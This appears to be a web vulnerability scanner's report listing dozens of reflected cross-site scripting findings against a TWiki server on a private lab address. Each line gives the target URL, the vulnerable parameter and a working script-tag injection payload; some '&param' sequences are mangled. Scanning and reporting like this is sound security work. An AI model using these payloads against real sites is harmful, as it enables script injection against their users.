http://192.168.105.200/twiki/bin/rdiff/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFEwTJlTIUTZhts?rev1=1.13&rev2=1.12 | Target: http://192.168.105.200/twiki/bin/rdiff/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFEwTJlTIUTZhts?rev1=1.13&rev2=1.12 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev1, vulnerabilitypayload:</title><ScRiPt >hOfO(2848)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/JavaScript?template=oopsempty | Target: http://192.168.105.200/twiki/bin/oops/TWiki/JavaScript?template=oopsempty has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >EnkV(2319)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WikiWordzXXHVlcqHCKC?template=oopsmore¶m1=1.10¶m2=1.10 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WikiWordzXXHVlcqHCKC?template=oopsmore¶m1=1.10¶m2=1.10 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >ySpY(7995)</ScRiPt> |
http://192.168.105.200/twiki/bin/view/TWiki/WebHomeaAiLtumIynHm?rev=1.120 | Target: http://192.168.105.200/twiki/bin/view/TWiki/WebHomeaAiLtumIynHm?rev=1.120 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev, vulnerabilitypayload:</title><ScRiPt >TEkv(1430)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WebTopicViewTemplate?template=oopsmore¶m1=1.6¶m2=1.6 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WebTopicViewTemplate?template=oopsmore¶m1=1.6¶m2=1.6 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >YTNk(8918)</ScRiPt> |
http://192.168.105.200/twiki/bin/rdiff/TWiki/MainFeatures?rev1=1.13&rev2=1.12 | Target: http://192.168.105.200/twiki/bin/rdiff/TWiki/MainFeatures?rev1=1.13&rev2=1.12 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev2, vulnerabilitypayload:</title><ScRiPt >Oolg(6307)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WebTopicNonWikiTemplatelFFzAgbwhaVq?template=oopsmore¶m1=1.7¶m2=1.7 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WebTopicNonWikiTemplatelFFzAgbwhaVq?template=oopsmore¶m1=1.7¶m2=1.7 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >qUdy(5462)</ScRiPt> |
http://192.168.105.200/twiki/bin/rdiff/TWiki/WikiWordzXXHVlcqHCKC?rev2=1.1&rev1=1.10 | Target: http://192.168.105.200/twiki/bin/rdiff/TWiki/WikiWordzXXHVlcqHCKC?rev2=1.1&rev1=1.10 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev1, vulnerabilitypayload:</title><ScRiPt >uetF(4595)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/Main/WIKILOGOURL?template=oopsmore¶m1=1.1¶m2=1.1 | Target: http://192.168.105.200/twiki/bin/oops/Main/WIKILOGOURL?template=oopsmore¶m1=1.1¶m2=1.1 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</li><ScRiPt >GKmg(5667)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WelcomeGuestqnNLAFixLaFquPpnlsYVRFCM?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WelcomeGuestqnNLAFixLaFquPpnlsYVRFCM?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >WAIu(8154)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/Main/WebSearch?template=oopsmore¶m1=1.1¶m2=1.1 | Target: http://192.168.105.200/twiki/bin/oops/Main/WebSearch?template=oopsmore¶m1=1.1¶m2=1.1 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >egoY(6294)</ScRiPt> |
http://192.168.105.200/twiki/bin/rdiff/TWiki/TWikiPreferencesoWuBVEKVgQrg?rev1=1.54&rev2=1.53 | Target: http://192.168.105.200/twiki/bin/rdiff/TWiki/TWikiPreferencesoWuBVEKVgQrg?rev1=1.54&rev2=1.53 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev2, vulnerabilitypayload:</title><ScRiPt >oKNc(1521)</ScRiPt> |
http://192.168.105.200/twiki/bin/rdiff/TWiki/WikiSyntaxzZCcGwUsIOEXJrxLzSaAuvSU?rev1=1.18&rev2=1.17 | Target: http://192.168.105.200/twiki/bin/rdiff/TWiki/WikiSyntaxzZCcGwUsIOEXJrxLzSaAuvSU?rev1=1.18&rev2=1.17 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev2, vulnerabilitypayload:</title><ScRiPt >tybb(7137)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WebRss?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WebRss?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >Yexv(7145)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WikiName?template=oopsmore¶m1=1.3¶m2=1.3 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WikiName?template=oopsmore¶m1=1.3¶m2=1.3 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >PvBK(7846)</ScRiPt> |
http://192.168.105.200/twiki/bin/rdiff/TWiki/TWikiSystemRequirements?rev1=1.35&rev2=1.34 | Target: http://192.168.105.200/twiki/bin/rdiff/TWiki/TWikiSystemRequirements?rev1=1.35&rev2=1.34 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev1, vulnerabilitypayload:</title><ScRiPt >mCVp(3126)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/TWikiTemplates?template=oopsempty | Target: http://192.168.105.200/twiki/bin/oops/TWiki/TWikiTemplates?template=oopsempty has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >nqgT(1391)</ScRiPt> |
http://192.168.105.200/twiki/bin/rdiff/TWiki/WebTopicNonWikiTemplatelFFzAgbwhaVq?rev1=1.7&rev2=1.6 | Target: http://192.168.105.200/twiki/bin/rdiff/TWiki/WebTopicNonWikiTemplatelFFzAgbwhaVq?rev1=1.7&rev2=1.6 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev2, vulnerabilitypayload:</title><ScRiPt >nGCz(5657)</ScRiPt> |
http://192.168.105.200/twiki/bin/view/TWiki/TWikiSystemRequirements?skin=print&rev=1.35 | Target: http://192.168.105.200/twiki/bin/view/TWiki/TWikiSystemRequirements?skin=print&rev=1.35 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev, vulnerabilitypayload:<ScRiPt >VMdi(7820)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/Main/WebHomesmLtmqbQKQKMtrskOTeZNsnAsnIxaanjXYFH?template=oopsempty | Target: http://192.168.105.200/twiki/bin/oops/Main/WebHomesmLtmqbQKQKMtrskOTeZNsnAsnIxaanjXYFH?template=oopsempty has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >ZSpc(8678)</ScRiPt> |
http://192.168.105.200/twiki/bin/rdiff/TWiki/WebPreferences?rev1=1.38&rev2=1.37 | Target: http://192.168.105.200/twiki/bin/rdiff/TWiki/WebPreferences?rev1=1.38&rev2=1.37 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev1, vulnerabilitypayload:</title><ScRiPt >HhLm(2117)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WebTopicViewTemplate?template=oopsupload | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WebTopicViewTemplate?template=oopsupload has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >Pszn(4743)</ScRiPt> |
http://192.168.105.200/twiki/bin/view/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFEwTJlTIUTZhts?skin=print&rev=1.12 | Target: http://192.168.105.200/twiki/bin/view/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFEwTJlTIUTZhts?skin=print&rev=1.12 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev, vulnerabilitypayload:<ScRiPt >pKAY(6782)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/TWikiMission?template=oopsempty | Target: http://192.168.105.200/twiki/bin/oops/TWiki/TWikiMission?template=oopsempty has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >pQDH(8432)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WikiTopic?template=oopsmore¶m1=1.5¶m2=1.5 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WikiTopic?template=oopsmore¶m1=1.5¶m2=1.5 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</li><ScRiPt >Flox(1409)</ScRiPt> |
http://192.168.105.200/twiki/bin/rdiff/TWiki/WikiName?rev1=1.3&rev2=1.2 | Target: http://192.168.105.200/twiki/bin/rdiff/TWiki/WikiName?rev1=1.3&rev2=1.2 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev1, vulnerabilitypayload:</title><ScRiPt >xERz(7035)</ScRiPt> |
http://192.168.105.200/twiki/bin/view/TWiki/WebPreferences?rev=r1.38 | Target: http://192.168.105.200/twiki/bin/view/TWiki/WebPreferences?rev=r1.38 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev, vulnerabilitypayload:</title><ScRiPt >RLoj(1678)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/Main/WebHome?template=oopsempty | Target: http://192.168.105.200/twiki/bin/oops/Main/WebHome?template=oopsempty has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >rSks(2119)</ScRiPt> |
http://192.168.105.200/twiki/bin/rdiff/Main/WebHomeoUiOyhwtrYHibJggYyZwaerd?rev1=1.23&rev2=1.22 | Target: http://192.168.105.200/twiki/bin/rdiff/Main/WebHomeoUiOyhwtrYHibJggYyZwaerd?rev1=1.23&rev2=1.22%3C%2Ftitle%3E%3CScRiPt %3ENKzE(8922)%3C%2FScRiPt%3E exists Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability payload: </title><ScRiPt >NKzE(8922)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/Main/WebStatisticseoqWHqiUWCDa?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/Main/WebStatisticseoqWHqiUWCDa?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</font><ScRiPt >fiZg(7466)</ScRiPt> |
http://192.168.105.200/twiki/bin/view/TWiki/TWikiPreferencesoWuBVEKVgQrg?rev=r1.54 | Target: http://192.168.105.200/twiki/bin/view/TWiki/TWikiPreferencesoWuBVEKVgQrg?rev=r1.54 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev, vulnerabilitypayload:</title><ScRiPt >JCdr(2730)</ScRiPt> |
http://192.168.105.200/twiki/bin/rdiff/TWiki/WikiTopic?rev1=1.5&rev2=1.4 | Target: http://192.168.105.200/twiki/bin/rdiff/TWiki/WikiTopic?rev1=1.5&rev2=1.4 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev1, vulnerabilitypayload:</title><ScRiPt >NNCM(7600)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WIKILOGOIMG?template=oopsmore¶m1=1.1¶m2=1.1 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WIKILOGOIMG?template=oopsmore¶m1=1.1¶m2=1.1 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >djZh(6990)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/Main/WIKILOGOIMG?template=oopsmissing | Target: http://192.168.105.200/twiki/bin/oops/Main/WIKILOGOIMG?template=oopsmissing has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >bMAU(9099)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WebTopicList?template=oopsmore¶m1=1.18¶m2=1.18 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WebTopicList?template=oopsmore¶m1=1.18¶m2=1.18 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</li><ScRiPt >VQVr(3209)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/YouAreHereswsMZQFRDgCN?template=oopsmissing | Target: http://192.168.105.200/twiki/bin/oops/TWiki/YouAreHereswsMZQFRDgCN?template=oopsmissing has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >wsPj(6214)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/MainFeatures?template=oopsmore¶m1=1.13¶m2=1.13 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/MainFeatures?template=oopsmore¶m1=1.13¶m2=1.13 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >gLxV(2864)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WelcomeGuestqnNLAFixLaFquPpnlsYVRFCM?template=oopsempty | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WelcomeGuestqnNLAFixLaFquPpnlsYVRFCM?template=oopsempty has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >STRM(7528)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WebTopicViewTemplate?template=oopsmore¶m1=1.6¶m2=1.6 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WebTopicViewTemplate?template=oopsmore¶m1=1.6¶m2=1.6 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</li><ScRiPt >YTNk(8918)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/Main/WebSearch?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/Main/WebSearch?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</font><ScRiPt >vngn(6845)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WindowsInstallCookbookQPyVVfTNrWmC?template=oopsempty | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WindowsInstallCookbookQPyVVfTNrWmC?template=oopsempty has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >HeZn(4491)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WebPreferences?template=oopsmore¶m1=1.38¶m2=1.38 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WebPreferences?template=oopsmore¶m1=1.38¶m2=1.38 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >NOkX(1910)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/GoodStyle?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/TWiki/GoodStyle?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</font><ScRiPt >UbAX(8618)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WebHome?template=oopsmore¶m1=1.120¶m2=1.120 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WebHome?template=oopsmore¶m1=1.120¶m2=1.120 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >qyDI(7224)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/FileAttachment?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/TWiki/FileAttachment?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >JDrO(8158)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WikiWordzXXHVlcqHCKC?template=oopsmore¶m1=1.10¶m2=1.10 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WikiWordzXXHVlcqHCKC?template=oopsmore¶m1=1.10¶m2=1.10 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</li><ScRiPt >ySpY(7995)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/Main/WebStatisticseoqWHqiUWCDa?template=oopsempty | Target: http://192.168.105.200/twiki/bin/oops/Main/WebStatisticseoqWHqiUWCDa?template=oopsempty has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >bZGd(6387)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/Main/WebHomeoUiOyhwtrYHibJggYyZwaerd?template=oopsmore¶m1=1.24¶m2=1.24 | Target: http://192.168.105.200/twiki/bin/oops/Main/WebHomeoUiOyhwtrYHibJggYyZwaerd?template=oopsmore¶m1=1.24¶m2=1.24 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >tiQU(3083)</ScRiPt> |
http://192.168.105.200/twiki/bin/view/TWiki/WikiName?rev=r1.3 | Target: http://192.168.105.200/twiki/bin/view/TWiki/WikiName?rev=r1.3 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev, vulnerabilitypayload:</title><ScRiPt >Hdzc(3324)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/TWikiPlugins?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/TWiki/TWikiPlugins?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >tWPZ(1509)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/Main/TWikiGroups?template=oopsmore¶m1=1.1¶m2=1.1 | Target: http://192.168.105.200/twiki/bin/oops/Main/TWikiGroups?template=oopsmore¶m1=1.1¶m2=1.1 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >NjOP(5062)</ScRiPt> |
http://192.168.105.200/twiki/bin/rdiff/TWiki/TWikiSystemRequirements?rev2=1.1&rev1=1.35 | Target: http://192.168.105.200/twiki/bin/rdiff/TWiki/TWikiSystemRequirements?rev2=1.1&rev1=1.35 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev1, vulnerabilitypayload:</title><ScRiPt >fzqk(9382)</ScRiPt> |
http://192.168.105.200/twiki/bin/rdiff/TWiki/WebHomeaAiLtumIynHm?rev1=1.121&rev2=1.120 | Target: http://192.168.105.200/twiki/bin/rdiff/TWiki/WebHomeaAiLtumIynHm?rev1=1.121&rev2=1.120 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev2, vulnerabilitypayload:</title><ScRiPt >fBam(6309)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/Main/WIKILOGOIMG?template=oopsmore¶m1=1.1¶m2=1.1 | Target: http://192.168.105.200/twiki/bin/oops/Main/WIKILOGOIMG?template=oopsmore¶m1=1.1¶m2=1.1 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >Cshr(9544)</ScRiPt> |
http://192.168.105.200/twiki/bin/rdiff/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFEwTJlTIUTZhts?rev2=1.1&rev1=1.13 | Target: http://192.168.105.200/twiki/bin/rdiff/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFEwTJlTIUTZhts?rev2=1.1&rev1=1.13 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev1, vulnerabilitypayload:</title><ScRiPt >HJxt(5971)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WelcomeGuestqnNLAFixLaFquPpnlsYVRFCM?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WelcomeGuestqnNLAFixLaFquPpnlsYVRFCM?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</font><ScRiPt >WAIu(8154)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WebHome?template=oopstopicexists | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WebHome?template=oopstopicexists has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >JqBB(3410)</ScRiPt> |
http://192.168.105.200/twiki/bin/rdiff/TWiki/WikiNotation?rev1=1.3&rev2=1.2 | Target: http://192.168.105.200/twiki/bin/rdiff/TWiki/WikiNotation?rev1=1.3&rev2=1.2 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev1, vulnerabilitypayload:</title><ScRiPt >UiBV(7883)</ScRiPt> |
http://192.168.105.200/twiki/bin/rdiff/TWiki/WebTopicViewTemplate?rev1=1.6&rev2=1.5 | Target: http://192.168.105.200/twiki/bin/rdiff/TWiki/WebTopicViewTemplate?rev1=1.6&rev2=1.5 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev2, vulnerabilitypayload:</title><ScRiPt >cYAl(3179)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/GoodStylebmCSuNsfoYww?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/TWiki/GoodStylebmCSuNsfoYww?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</font><ScRiPt >KdsD(9762)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/bad?template=oopsmore¶m1=1.1¶m2=1.1 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/bad?template=oopsmore¶m1=1.1¶m2=1.1 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >VDVU(9666)</ScRiPt> |
http://192.168.105.200/twiki/bin/rdiff/Main/TWikiAdminGroup?rev2=1.1&rev1=1.20 | Target: http://192.168.105.200/twiki/bin/rdiff/Main/TWikiAdminGroup?rev2=1.1&rev1=1.20 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev1, vulnerabilitypayload:</title><ScRiPt >VNjr(5537)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/whether?template=oopsmore¶m1=1.1¶m2=1.1 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/whether?template=oopsmore¶m1=1.1¶m2=1.1 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >WISF(5898)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFEwTJlTIUTZhts?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFEwTJlTIUTZhts?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</font><ScRiPt >GmTl(7015)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/Main/TWikiAdminGroup?template=oopsmore¶m1=1.20¶m2=1.20 | Target: http://192.168.105.200/twiki/bin/oops/Main/TWikiAdminGroup?template=oopsmore¶m1=1.20¶m2=1.20 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >Hsqa(8711)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/JavaScript?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/TWiki/JavaScript?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >UGjL(9051)</ScRiPt> |
http://192.168.105.200/twiki/bin/rdiff/TWiki/TWikiSystemRequirements?rev1=1.35&rev2=1.34 | Target: http://192.168.105.200/twiki/bin/rdiff/TWiki/TWikiSystemRequirements?rev1=1.35&rev2=1.34 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev2, vulnerabilitypayload:</title><ScRiPt >mCVp(3126)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WebTopicList?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WebTopicList?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</font><ScRiPt >WrvH(6068)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/Main/WebHomesmLtmqbQKQKMtrskOTeZNsnAsnIxaanjXYFH?template=oopsmore¶m1=1.10¶m2=1.10 | Target: http://192.168.105.200/twiki/bin/oops/Main/WebHomesmLtmqbQKQKMtrskOTeZNsnAsnIxaanjXYFH?template=oopsmore¶m1=1.10¶m2=1.10 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >TkHx(4037)</ScRiPt> |
http://192.168.105.200/twiki/bin/rdiff/TWiki/WebHomeaAiLtumIynHm?rev1=1.121&rev2=1.120 | Target: http://192.168.105.200/twiki/bin/rdiff/TWiki/WebHomeaAiLtumIynHm?rev1=1.121&rev2=1.120 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev1, vulnerabilitypayload:</title><ScRiPt >fBam(6309)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WebTopicList?template=oopstopicexists | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WebTopicList?template=oopstopicexists has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >cyQR(4809)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFEwTJlTIUTZhts?template=oopsmore¶m1=1.13¶m2=1.13 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFEwTJlTIUTZhts?template=oopsmore¶m1=1.13¶m2=1.13 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</li><ScRiPt >BdYH(6576)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WikiName?template=oopsmore¶m1=1.3¶m2=1.3 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WikiName?template=oopsmore¶m1=1.3¶m2=1.3 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</li><ScRiPt >PvBK(7846)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/TWikiSkins?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/TWiki/TWikiSkins?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >lVtk(9498)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/TWikiMission?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/TWiki/TWikiMission?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >CWgd(4435)</ScRiPt> |
